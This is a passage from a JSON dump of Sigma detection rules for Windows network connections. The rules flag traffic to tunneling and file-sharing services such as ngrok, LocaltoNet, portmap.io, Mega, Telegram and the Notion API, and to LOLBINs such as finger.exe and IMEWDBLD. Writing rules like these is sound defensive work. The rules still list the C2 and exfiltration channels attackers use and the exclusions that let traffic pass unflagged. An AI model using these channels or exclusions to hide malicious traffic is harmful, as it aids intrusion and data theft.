Image|endswith:\n            - ':\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - ':\\Program 
Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|contains: ':\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith:\n              - ':\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - ':\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n              - '\\WindowsApps\\MicrosoftEdge.exe'\n    filter_optional_edge_2:\n        Image|contains:\n            - ':\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - ':\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    filter_optional_googleupdate:\n        Image|endswith: '\\GoogleUpdate.exe'\n    filter_optional_outlook_exe:\n        Image|endswith: '\\outlook.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml",
    "content": "title: Communication To LocaltoNet Tunneling Service Initiated\nid: 3ab65069-d82a-4d44-a759-466661a082d1\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\n    LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\n    Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\nreferences:\n    - https://localtonet.com/documents/supported-tunnels\n    - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-06-17\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|endswith:\n            - '.localto.net'\n            - '.localtonet.com'\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the LocaltoNet service.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_mega_nz.yml",
    "content": "title: Network Connection Initiated To Mega.nz\nid: fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4\nstatus: test\ndescription: |\n    Detects a network connection initiated by a binary to \"api.mega.co.nz\".\n    Attackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.\nreferences:\n    - https://megatools.megous.com/\n    - https://www.mandiant.com/resources/russian-targeting-gov-business\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-06\nmodified: 2024-05-31\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - 'mega.co.nz'\n            - 'mega.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.\nlevel: low\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_ngrok.yml",
    "content": "title: Process Initiated Network Connection To Ngrok Domain\nid: 18249279-932f-45e2-b37a-8925f2597670\nrelated:\n    - id: 1d08ac94-400d-4469-a82f-daee9a908849\n      type: similar\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"ngrok\" domains.\n    Attackers were seen using \"ngrok\" in order to host their second stage payloads and malware.\n    While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or additional payload downloads.\nreferences:\n    - https://ngrok.com/\n    - https://ngrok.com/blog-post/new-ngrok-domains\n    - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/\n    - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-16\nmodified: 2025-07-30\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.ngrok-free.app'\n            - '.ngrok-free.dev'\n            - '.ngrok.app'\n            - '.ngrok.dev'\n            - '.ngrok.io'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the ngrok service.\n# Note: The level of this rule is related to your internal policy.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml",
    "content": "title: Communication To Ngrok Tunneling Service Initiated\nid: 1d08ac94-400d-4469-a82f-daee9a908849\nrelated:\n    - id: 18249279-932f-45e2-b37a-8925f2597670\n      type: similar\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\n    Attackers were seen using \"ngrok\" in order to host their second stage payloads and malware.\n    While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or additional payload downloads.\nreferences:\n    - https://twitter.com/hakluke/status/1587733971814977537/photo/1\n    - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-03\nmodified: 2024-02-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1568.002\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\n    - attack.s0508\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|contains:\n            - 'tunnel.us.ngrok.com'\n            - 'tunnel.eu.ngrok.com'\n            - 'tunnel.ap.ngrok.com'\n            - 'tunnel.au.ngrok.com'\n            - 'tunnel.sa.ngrok.com'\n            - 'tunnel.jp.ngrok.com'\n            - 'tunnel.in.ngrok.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the ngrok service.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml",
    "content": "title: Potentially Suspicious Network Connection To Notion API\nid: 7e9cf7b6-e827-11ed-a05b-15959c120003\nstatus: test\ndescription: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"\nreferences:\n    - https://github.com/mttaggart/OffensiveNotion\n    - https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332\nauthor: Gavin Knapp\ndate: 2023-05-03\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'api.notion.com'\n    filter_main_notion:\n        Image|endswith: '\\AppData\\Local\\Programs\\Notion\\Notion.exe'\n    filter_main_brave:\n        Image|endswith: '\\brave.exe'\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n           
 - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_opera:\n        Image|endswith: '\\opera.exe'\n    filter_main_safari:\n        Image|endswith: '\\safari.exe'\n    filter_main_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.\nlevel: low\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_portmap.yml",
    "content": "title: Network Communication Initiated To Portmap.IO Domain\nid: 07837ab9-60e1-481f-a74d-c31fb496a94c\nstatus: test\ndescription: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors\nreferences:\n    - https://portmap.io/\n    - https://github.com/rapid7/metasploit-framework/issues/11337\n    - https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\nauthor: Florian Roth (Nextron Systems)\ndate: 2024-05-31\ntags:\n    - attack.t1041\n    - attack.command-and-control\n    - attack.t1090.002\n    - attack.exfiltration\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.portmap.io'\n    condition: selection\nfalsepositives:\n    - Legitimate use of portmap.io domains\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Telegram API\nid: c3dbbc9f-ef1d-470a-a90a-d343448d5875\nstatus: test\ndescription: Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2 channel\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1102\n    - attack.t1567\n    - attack.t1105\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'api.telegram.org'\n    # Other browsers or apps known to use telegram should be added\n    # TODO: Add full paths for default install locations\n    filter_main_brave:\n        Image|endswith: '\\brave.exe'\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_opera:\n        Image|endswith: '\\opera.exe'\n    filter_main_safari:\n        Image|endswith: '\\safari.exe'\n    filter_main_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications communicating with the Telegram API, e.g. web browsers not in the exclusion list, apps with an RSS feed, etc.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml",
    "content": "title: Network Connection Initiated To Visual Studio Code Tunnels Domain\nid: 4b657234-038e-4ad5-997c-4be42340bce4\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://cydefops.com/vscode-data-exfiltration\nauthor: Kamran Saifullah\ndate: 2023-11-20\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.tunnels.api.visualstudio.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_eqnedt.yml",
    "content": "title: Network Connection Initiated By Eqnedt32.EXE\nid: a66bc059-c370-472c-a0d7-f8fd1bf9d583\nstatus: test\ndescription: Detects network connections from the Equation Editor process \"eqnedt32.exe\".\nreferences:\n    - https://twitter.com/forensicitguy/status/1513538712986079238\n    - https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/\n    - https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-14\nmodified: 2024-05-31\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\eqnedt32.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_finger.yml",
    "content": "title: Network Connection Initiated via Finger.EXE\nid: 2fdaf50b-9fd5-449f-ba69-f17248119af6\nrelated:\n    - id: c082c2b0-525b-4dbc-9a26-a57dc4692074\n      type: similar\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\n    In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\n    Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\n    Investigating such network connections can also help identify potential malicious infrastructure used by threat actors\nreferences:\n    - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_imewdbld.yml",
    "content": "title: Network Connection Initiated By IMEWDBLD.EXE\nid: 8d7e392e-9b28-49e1-831d-5949c6281228\nrelated:\n    - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download\n    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\IMEWDBLD.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: Please reduce this to medium if you find legitimate connections\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_notepad.yml",
    "content": "title: Network Connection Initiated Via Notepad.EXE\nid: e81528db-fc02-45e8-8e98-4e84aba1f10b\nstatus: test\ndescription: |\n    Detects a network connection that is initiated by the \"notepad.exe\" process.\n    This might be a sign of process injection from a beacon process or something similar.\n    Notepad rarely initiates a network communication except when printing documents for example.\nreferences:\n    - https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\n    - https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet\nauthor: EagleEye Team\ndate: 2020-05-14\nmodified: 2024-02-02\ntags:\n    - attack.privilege-escalation\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\notepad.exe'\n    filter_optional_printing:\n        DestinationPort: 9100\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Printing documents via notepad might cause communication with the printer via port 9100 or similar.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml",
    "content": "title: Office Application Initiated Network Connection To Non-Local IP\nid: 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84\nstatus: test\ndescription: |\n    Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address.\n    This rule aims to detect traffic similar to that seen during exploitation of CVE-2021-42292.\n    This rule will require an initial baseline and tuning that is specific to your organization.\nreferences:\n    - https://corelight.com/blog/detecting-cve-2021-42292\n    - https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-10\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wordview.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_msrange_generic:\n        DestinationIp|cidr:\n            - '2.16.56.0/23' # Akamai International B.V.\n            - '2.17.248.0/21' # Akamai International B.V.\n            - '13.107.240.0/21' # Microsoft Corporation\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '23.61.224.0/20' # Akamai-AS\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.72.0.0/13' # Akamai 
International B.V.\n            - '23.3.88.0/22' # Akamai-AS\n            - '23.216.132.0/22' # Akamai-AS\n            - '40.76.0.0/14' # Microsoft Corporation\n            - '51.10.0.0/15' # Microsoft Corporation\n            - '51.103.0.0/16' # Microsoft Corporation\n            - '51.104.0.0/15' # Microsoft Corporation\n            - '51.142.136.0/22' # Microsoft Corporation - https://ipinfo.io/AS8075/51.140.0.0/14-51.142.136.0/22\n            - '52.160.0.0/11' # Microsoft Corporation - https://ipinfo.io/AS8075/52.160.0.0/11\n            - '95.101.96.0/21' # Akamai-As\n            - '204.79.197.0/24' # Microsoft Corporation\n    filter_main_msrange_exchange_1:\n        # Exchange Online\n        # \"urls\": [\n        #       \"outlook.cloud.microsoft\",\n        #       \"outlook.office.com\",\n        #       \"outlook.office365.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.4.0/22'\n            - '13.107.6.152/31'\n            - '13.107.18.10/31'\n            - '13.107.42.0/23'\n            - '13.107.128.0/22'\n            - '23.35.224.0/20'\n            - '23.53.40.0/22'\n            - '23.103.160.0/20'\n            - '23.216.76.0/22'\n            - '40.96.0.0/13'\n            - '40.104.0.0/15'\n            - '52.96.0.0/14'\n            - '131.253.33.215/32'\n            - '132.245.0.0/16'\n            - '150.171.32.0/22'\n            - '204.79.197.215/32'\n            - '2603:1006::/40'\n            - '2603:1016::/36'\n            - '2603:1026::/36'\n            - '2603:1036::/36'\n            - '2603:1046::/36'\n            - '2603:1056::/36'\n            - '2620:1ec:4::152/128'\n            - '2620:1ec:4::153/128'\n            - '2620:1ec:c::10/128'\n            - '2620:1ec:c::11/128'\n            - '2620:1ec:d::10/128'\n            - '2620:1ec:d::11/128'\n            - '2620:1ec:8f0::/46'\n            - '2620:1ec:900::/46'\n            - '2620:1ec:a92::152/128'\n            - '2620:1ec:a92::153/128'\n        DestinationPort:\n     
       - 80\n            - 443\n    filter_main_msrange_exchange_2:\n        # Exchange Online\n        # \"urls\": [\n        #       \"outlook.office365.com\",\n        #       \"smtp.office365.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.6.152/31'\n            - '13.107.18.10/31'\n            - '13.107.128.0/22'\n            - '23.103.160.0/20'\n            - '40.96.0.0/13'\n            - '40.104.0.0/15'\n            - '52.96.0.0/14'\n            - '131.253.33.215/32'\n            - '132.245.0.0/16'\n            - '150.171.32.0/22'\n            - '204.79.197.215/32'\n            - '2603:1006::/40'\n            - '2603:1016::/36'\n            - '2603:1026::/36'\n            - '2603:1036::/36'\n            - '2603:1046::/36'\n            - '2603:1056::/36'\n            - '2620:1ec:4::152/128'\n            - '2620:1ec:4::153/128'\n            - '2620:1ec:c::10/128'\n            - '2620:1ec:c::11/128'\n            - '2620:1ec:d::10/128'\n            - '2620:1ec:d::11/128'\n            - '2620:1ec:8f0::/46'\n            - '2620:1ec:900::/46'\n            - '2620:1ec:a92::152/128'\n            - '2620:1ec:a92::153/128'\n        DestinationPort:\n            - 143\n            - 587\n            - 993\n            - 995\n        Protocol: 'tcp'\n    filter_main_msrange_exchange_3:\n        # Exchange Online\n        # \"urls\": [\n        #       \"*.protection.outlook.com\"\n        #  ]\n        DestinationIp|cidr:\n            - '40.92.0.0/15'\n            - '40.107.0.0/16'\n            - '52.100.0.0/14'\n            - '52.238.78.88/32'\n            - '104.47.0.0/17'\n            - '2a01:111:f400::/48'\n            - '2a01:111:f403::/48'\n        DestinationPort: 443\n    filter_main_msrange_exchange_4:\n        # Exchange Online\n        # \"urls\": [\n        #       \"*.mail.protection.outlook.com\",\n        #       \"*.mx.microsoft\"\n        #  ]\n        DestinationIp|cidr:\n            - '40.92.0.0/15'\n            - 
'40.107.0.0/16'\n            - '52.100.0.0/14'\n            - '52.238.78.88/32'\n            - '104.47.0.0/17'\n            - '2a01:111:f400::/48'\n            - '2a01:111:f403::/48'\n        DestinationPort: 25\n    filter_main_msrange_sharepoint_1:\n        # SharePoint Online and OneDrive for Business\",\n        # \"urls\": [\n        #       \"*.sharepoint.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.136.0/22'\n            - '40.108.128.0/17'\n            - '52.104.0.0/14'\n            - '104.146.128.0/17'\n            - '150.171.40.0/22'\n            - '2603:1061:1300::/40'\n            - '2620:1ec:8f8::/46'\n            - '2620:1ec:908::/46'\n            - '2a01:111:f402::/48'\n        DestinationPort:\n            - 80\n            - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_1:\n        # Microsoft 365 Common and Office Online\",\n        # \"urls\": [\n        #       \"*.officeapps.live.com\",\n        #       \"*.online.office.com\",\n        #       \"office.live.com\",\n        #       \"office.com.akadns.net\"\n        # ],\n        DestinationIp|cidr:\n            - '13.107.6.171/32'\n            - '13.107.18.15/32'\n            - '13.107.140.6/32'\n            - '20.64.0.0/10'\n            - '52.108.0.0/14'\n            - '52.244.37.168/32'\n            - '2603:1006:1400::/40'\n            - '2603:1016:2400::/40'\n            - '2603:1026:2400::/40'\n            - '2603:1036:2400::/40'\n            - '2603:1046:1400::/40'\n            - '2603:1056:1400::/40'\n            - '2603:1063:2000::/38'\n            - '2620:1ec:c::15/128'\n            - '2620:1ec:8fc::6/128'\n            - '2620:1ec:a92::171/128'\n            - '2a01:111:f100:2000::a83e:3019/128'\n            - '2a01:111:f100:2002::8975:2d79/128'\n            - '2a01:111:f100:2002::8975:2da8/128'\n            - '2a01:111:f100:7000::6fdd:6cd5/128'\n            - '2a01:111:f100:a004::bfeb:88cf/128'\n        DestinationPort:\n            - 80\n       
     - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_2:\n        # Microsoft 365 Common and Office Online\n        # \"urls\": [\n        #       \"*.auth.microsoft.com\",\n        #       \"*.msftidentity.com\",\n        #       \"*.msidentity.com\",\n        #       \"account.activedirectory.windowsazure.com\",\n        #       \"accounts.accesscontrol.windows.net\",\n        #       \"adminwebservice.microsoftonline.com\",\n        #       \"api.passwordreset.microsoftonline.com\",\n        #       \"autologon.microsoftazuread-sso.com\",\n        #       \"becws.microsoftonline.com\",\n        #       \"ccs.login.microsoftonline.com\",\n        #       \"clientconfig.microsoftonline-p.net\",\n        #       \"cloudapp.azure.com\",\n        #       \"companymanager.microsoftonline.com\",\n        #       \"device.login.microsoftonline.com\",\n        #       \"graph.microsoft.com\",\n        #       \"graph.windows.net\",\n        #       \"login-us.microsoftonline.com\",\n        #       \"login.microsoft.com\",\n        #       \"login.microsoftonline-p.com\",\n        #       \"login.microsoftonline.com\",\n        #       \"login.windows.net\",\n        #       \"logincert.microsoftonline.com\",\n        #       \"loginex.microsoftonline.com\",\n        #       \"nexus.microsoftonline-p.com\",\n        #       \"passwordreset.microsoftonline.com\",\n        #       \"provisioningapi.microsoftonline.com\",\n        #       \"web.core.windows.net\",\n        # ]\n        DestinationIp|cidr:\n            - '172.128.0.0/10'\n            - '20.20.32.0/19'\n            - '20.103.156.88/32' # msn.com\n            - '20.190.128.0/18'\n            - '20.231.128.0/19'\n            - '40.126.0.0/18'\n            - '57.150.0.0/15'\n            - '2603:1006:2000::/48'\n            - '2603:1007:200::/48'\n            - '2603:1016:1400::/48'\n            - '2603:1017::/48'\n            - '2603:1026:3000::/48'\n            - '2603:1027:1::/48'\n            - 
'2603:1036:3000::/48'\n            - '2603:1037:1::/48'\n            - '2603:1046:2000::/48'\n            - '2603:1047:1::/48'\n            - '2603:1056:2000::/48'\n            - '2603:1057:2::/48'\n        DestinationPort:\n            - 80\n            - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_3:\n        # Microsoft 365 Common and Office Online\n        #  \"urls\": [\n        #       \"*.compliance.microsoft.com\",\n        #       \"*.data.microsoft.com\",\n        #       \"*.protection.office.com\",\n        #       \"*.security.microsoft.com\",\n        #       \"compliance.microsoft.com\",\n        #       \"defender.microsoft.com\",\n        #       \"protection.office.com\",\n        #       \"security.microsoft.com\",\n        #       \"teams.microsoft.com\",\n        #  ]\n        DestinationIp|cidr:\n            - '13.64.0.0/11'\n            - '13.107.6.192/32'\n            - '13.107.9.192/32'\n            - '13.89.179.14/32'\n            - '20.40.0.0/14'\n            - '20.48.0.0/12'\n            - '20.64.0.0/12'\n            - '52.123.0.0/16'\n            - '52.108.0.0/14'\n            - '52.136.0.0/13'\n            - '57.150.0.0/15'\n            - '80.239.150.67/32' # Arelion Sweden AB\n            - '2620:1ec:4::192/128'\n            - '2620:1ec:a92::192/128'\n        DestinationPort: 443\n        Protocol: 'tcp'\n    filter_main_destination_host:\n        DestinationHostname|endswith: '.deploy.static.akamaitechnologies.com'\n        DestinationPort: 443\n        Protocol: 'tcp'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.\n    - Office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.\n    - It is highly recommended to baseline your activity and tune out common business use cases.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml",
